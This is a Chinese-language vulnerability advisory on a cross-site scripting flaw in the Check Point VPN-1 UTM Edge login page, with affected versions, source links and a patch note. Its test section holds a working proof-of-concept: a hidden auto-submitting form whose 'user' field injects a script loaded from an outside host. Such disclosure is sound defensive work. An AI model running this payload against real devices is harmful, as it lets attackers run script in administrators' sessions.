Check Point VPN-1 UTM Edge登录页面跨站脚本漏洞
受影响系统:
check point software vpn-1 utm edge ngx 7.0.48x
不受影响系统:
check point software vpn-1 utm edge ngx 7.5.48
描述:
--------------------------------------------------------------------------------
bugtraq id: 28116
vpn-1 utm edge是集成了防病毒、防火墙、入侵防护和vpn技术的安全接入解决方案。
vpn-1 utm edge的管理界面在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞执行跨站脚本攻击。
vpn-1 utm edge的登录页面没有正确地过滤user参数便返回给了用户,这允许攻击者通过跨站脚本攻击在用户浏览器会话中执行任意html和脚本代码。由于设备不接受get请求中的参数,因此攻击者必须要使用post请求来利用这个漏洞。
<*来源:henri lindberg (henri.lindberg@louhi.fi)
链接:http://secunia.com/advisories/29243/
http://marc.info/?l=bugtraq&m=120483120818369&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none">
<input name="user" value="'<script/src=//l7.fi></script>">
</form>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
check point software
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.checkpoint.com
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
-
-
-
-
-
-
-
关于XSS漏洞另一个攻击趋势
XSS漏洞一般是基于WEB程序的输入输出问题,但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞,在评估其中的XSS漏洞,我们发现了基于浏览器软件...
[阅读全文]
-
网友评论